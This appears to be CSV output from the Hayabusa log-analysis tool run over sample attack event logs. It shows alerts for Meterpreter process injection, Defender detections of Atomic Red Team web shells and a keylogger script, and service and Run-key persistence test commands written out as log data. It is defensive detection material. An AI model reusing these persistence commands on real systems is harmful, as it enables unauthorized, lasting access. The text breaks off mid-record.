2019-07-04 05:39:30.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.207 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\notepad.exe"" | LID: 0x135ca | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\system32\notepad.exe | Tgt Process: C:\Windows\system32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1632 | Src PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00 | Tgt PID: 2328 | Tgt PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread 
Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:31.707 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:8181 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 
05:40:16.396 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T | Severity: Severe | Type: Backdoor | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: 
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA21C70 | Process: C:\Windows\System32\consent.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5828 | PGUID: 747F3D96-D6EB-5D31-0000-0010E0252500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 3764 | PGUID: 747F3D96-D6ED-5D31-0000-0010C88A2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\phvj2yfb\phvj2yfb.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL 
File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4216 | PGUID: 747F3D96-D738-5D31-0000-001046A02600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | LID: 0x50951 | PID: 1700 | PGUID: 747F3D96-D738-5D31-0000-001098A22600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,Persis | PrivEsc,New Service Creation,,rules/sigma/process_creation/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | Process: 
C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2556 | PGUID: 747F3D96-D738-5D31-0000-001056A62600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe start AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D738-5D31-0000-0010D8AA2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6188 | PGUID: 747F3D96-D738-5D31-0000-00105CAC2600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5000 | PGUID: 
747F3D96-D739-5D31-0000-00104CB72600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe stop AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D739-5D31-0000-0010B6B92600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4744 | PGUID: 747F3D96-D739-5D31-0000-0010E4BB2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe delete AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | LID: 0x50951 | PID: 2884 | PGUID: 
747F3D96-D739-5D31-0000-001046BE2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D739-5D31-0000-0010B2C22600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5348 | PGUID: 747F3D96-D750-5D31-0000-0010B9F82600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-D765-5D31-0000-001027B72800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN 
Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | LID: 0x50951 | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team: C:\Path\AtomicRedTeam.exe | Process: C:\Windows\system32\reg.exe | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion 
